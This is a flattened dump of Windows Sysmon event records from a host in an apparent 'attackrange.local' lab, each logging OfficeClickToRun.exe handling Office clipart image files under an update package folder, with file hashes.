23542300x800000000000000065753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0145361.JPGMD5=635C7388039D85D21472E1B722A0804B,SHA256=BD8CFEBB0A123D8E4AC65286B5BFE1E109348F23BDFE591EC7DA9D0D27A2BEA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0145272.JPGMD5=D4651290F3C10101F5D0AAB4107C59CF,SHA256=2639F9199E85B2826664C1AC73F1F9396A33566D561FF71DCEC4918BF8B673B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0145212.JPGMD5=7309E1C4E64FBFF3644FACC50235AFEF,SHA256=E66090839BFFCA5C6A41AB2EE2640A8403BA22D5EA5E1801245029E05403F1CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0145168.JPGMD5=F7CB23AB4FB811A05DAC70F33F24865A,SHA256=6B5BD05C1F89EA56520F146A1D71F25517A3FBA28452231F5822C480607EAD86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0144773.JPGMD5=E110C8258C3F6D5A9B71C145E96450CB,SHA256=8C806BCF7EC92B5E61B195AF7064AC491D9939BFA4F4E0B7A277E9ED53CFEED9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0136865.WMFMD5=944A919741C2850598E914E4C449A550,SHA256=DF1796D8FD8DAD61F83701BDD6DF0C34A28AF4C52F4D41262EB0EFFEAF48EE90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107750.WMFMD5=7718E46E7638AB1C3491DB5436A8621E,SHA256=E342137CA4875030413C9B2EA4F1E26BAC03935516B4234C7684480532ED064F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107748.WMFMD5=51909D91C9CA7CD7107EFB4B7702007F,SHA256=597BE7C78D434E21238C048948C495B7245439E4EDCFA94EEEEADB842F44A4A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107746.WMFMD5=2A6A18941C9503B11C7F7F1D98AFDF81,SHA256=6279D6316EE878208BE89D659F782EAE5730C8F8F2B3B9BCE32B34649583AEED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107744.WMFMD5=F0E69CD59D38D13F7C980679D2FDD647,SHA256=A43A6E0A987673209F158E090068189BFDB38CDE49244FBF55C4ABB492D0DFF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107742.WMFMD5=8B2AAF56F1ED91A682FF3BB05D8CD14D,SHA256=1B07CAF09CFC4589701FDA2AA87EDB5858C03C553346E84066C8D9C27898AEBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107734.WMFMD5=B12BA7D9CE663AD086610B3D262D6023,SHA256=6F0F252B740FD9110195C14E9ECF9A0E69C8E3E4385E6D4869F6C9C1A47F5430,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107730.WMFMD5=943775CA018342BB28868E6D6D037A7D,SHA256=5B237457B8E49AC8DC19CD14F1FA801614367832AFA45EE34E1223B0BE34DABE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107728.WMFMD5=819626ADB33AF8BE184A2E53FE704EB5,SHA256=8819CA9909774F8B463C4E7C1D501ED498E37293B4735D3AA50CE8FA8BAB0390,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107724.WMFMD5=DEE8311D355AB4937163A996B3C28407,SHA256=834BB2553C353A37C5A2DF9EE174722924872F86D42685D3CDF63C7F2F04AF95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107722.WMFMD5=00F974391410A8AD9CEC9FA481E3467B,SHA256=29537AC4E026FF3BB0BC5549C53EA42BDEE8149D946FAAD6BB593C2522C6CBB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107718.WMFMD5=C22612744F3008A71CD4342E35318390,SHA256=DE8645CB5C1BF82CCDAD34AAB593348AA73EFCFB84019D46E154B79FD021CB4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107712.WMFMD5=366205E100472ABC6C25A37B9D10D3BF,SHA256=7FE04D1FA5159DC4BCC5E9096414BBD9E379571F97C26A7DB1ADA254D6B68A29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107708.WMFMD5=08EE515815E8E98CBAA45735111B5127,SHA256=3CD46E00148E795889F9D57E493B92A567CF6F06DAA34C31401B93961F02FC19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107658.WMFMD5=8EC01AFA42AB29047BF12103776FDC1E,SHA256=47EE227352D9AF2BD19CDB81CEE5165012DFDFB2A15A0957ECBBE4A5AF7CC7F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107544.WMFMD5=C34CC6CE76E446CA00CCAEB23C72FB90,SHA256=D286BFD10FD8F50E50F4E622677646D25D9B3DD0F4F213A71694F1109893BDA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107528.WMFMD5=57741D53439E7F0F40A5BC3D9448E68B,SHA256=4A499A4420332B6E8BD26D29889A995E00B9D2BD4DE843ED0977C131DC3D61BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107526.WMFMD5=B45F0F600D9B58FBF79DE0B3BD428694,SHA256=B803415C94B1D86879E082641F8348CFD836E8229760FE9759A0EBB3926D58D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107516.WMFMD5=5D05874D64775301E36E9871985E62D5,SHA256=1BFF31C05CB2D963B81C06A77F167B1DE51E0F7D0D62C43DD055EA4BF59A0955,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107514.WMFMD5=9AEB86E0751AEB920E305609A4F2590F,SHA256=33EE907D02DB71DB8A2810B0FF0AB6D0973CD00C214115A3F021E89BE9340A4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107512.WMFMD5=7ABF18E3DA829D7665366CF1178A7842,SHA256=549B85D7C71423653B907C2E05B5B09DB6CDDE0B38FBD8204C6B2665EDC5F236,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107502.WMFMD5=364640992C3985078B3BB33BC7E73A54,SHA256=7CD0B11090616AFDE8612E87B3BDA0FF4A7F3E587E183BC26A027D51131454B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107500.WMFMD5=611B524C8ECA65B651DE57372ED3F020,SHA256=3189415AE1EBF74DEF913D35EB509C6D096901F77248504540854EBF5F07ACEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107496.WMFMD5=C2C95E46C58AFE035330BC060367AE5E,SHA256=A658FC64D16B2DD30B1D998EBC6A52162F8DF3E1F8B1A0BD6DADAA324D939F4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107494.WMFMD5=F6A7D6B2FFA4FA65F025BF1FE935C4C1,SHA256=A0DEF73986D8375981517A885A6362B96C8F3A3AC9FA9A7284FA494BA2977AA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107492.WMFMD5=A91355E087BAA1D8B192D13C67CD9E00,SHA256=3AD06ECBF1396936D0E722F49FE16DD49709AF131DD08B53F442EDE3124D2E22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107490.WMFMD5=EEDBD471F076F06C758A9B9AD3D6AA21,SHA256=3C219F0D0E27C87650024F73BE99BAE4A03D4D22C1D46989BF7ED71BD5EB732C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107488.WMFMD5=7AA7CA12AD3E5B81C8E23EAC0240ECA6,SHA256=20147ED9A011CEF852F34F03ABCE09E66C4280A39EC450BE0BE54F8E83E50D5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107484.WMFMD5=5493FCFC07BCD6C9B6CBB8E69B4BF815,SHA256=510FAADC1A27B2406B6BA1A95A72000F3042EB334A4E3FF27EF85BE2475ED3F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107482.WMFMD5=1AD7CEB062BE8D3C514C7C50DB9E1F9A,SHA256=14D57FD09BD59BEF6278D9EDC9945E5E472BB7D6B03EB71617BEB5BFC39BF44B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107480.WMFMD5=FB4DC96DD72ED9F4EB2943C545697A60,SHA256=22CEA334C10AB880A7FD3A7866EBC9230B8C878B258B10C3CF8CF862553326D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107468.WMFMD5=D3DFD3C575BE9E56DFDE31BCABFAE58B,SHA256=D858ADB263629BC9359308D00CF5371496B2EBAE34873AA8C18C8E2C5FE9FBDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107458.WMFMD5=DBB87736AC526077161B495A50811024,SHA256=DC81D35CD59172924ED5266604FCA9514D97A49D27F74B0F26BA479820299194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107456.WMFMD5=38DEE77861C05A84D6DCA078F3B5CAD3,SHA256=A0E03AB955F68425EACDCD7D8F506657044694ECC2E4BAC4278077D0F158DF70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107452.WMFMD5=1BBE451120213E9AB17015F51E0D51DC,SHA256=1D9220FD74E62A59690E7C9735BAEC519B245406788AAEE8A03D2014E32C79B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107450.WMFMD5=7D190466EA5675C118746FD5E5603954,SHA256=20CDE6BC38A8AFF5500D6B94E407D19D8A0AC308FBFCCEBE5A4D69AD95D8C9C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107446.WMFMD5=0049331B678C2C117C707BCB881ACCF2,SHA256=B4C43BEE779FAD570898415AB61B94805F6C00F98BB4A24DAA39C0917ABD5495,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107426.WMFMD5=318A83433540BBF81264371CB51F12F4,SHA256=0A3CA95E82551E68C2C4BF011AEB9852452BCC978D89843CFEE6110F9DEF7751,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107364.WMFMD5=4CA455BD6D13A7FB2E025813DF3D9DF1,SHA256=33460C2FA73F0BEDCB9D560B8D099CCE0511399E5B61A5379753F189DDE00949,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0107358.WMFMD5=3B1D212906AB1C51EB5C7A131EF91B41,SHA256=831E2EF30A6E620C85283CD20305BC445D3CD4EECF9BD7489BA2D401FC1FA9F9,IMPHASH=00000000000000000000000000000000falsetrue 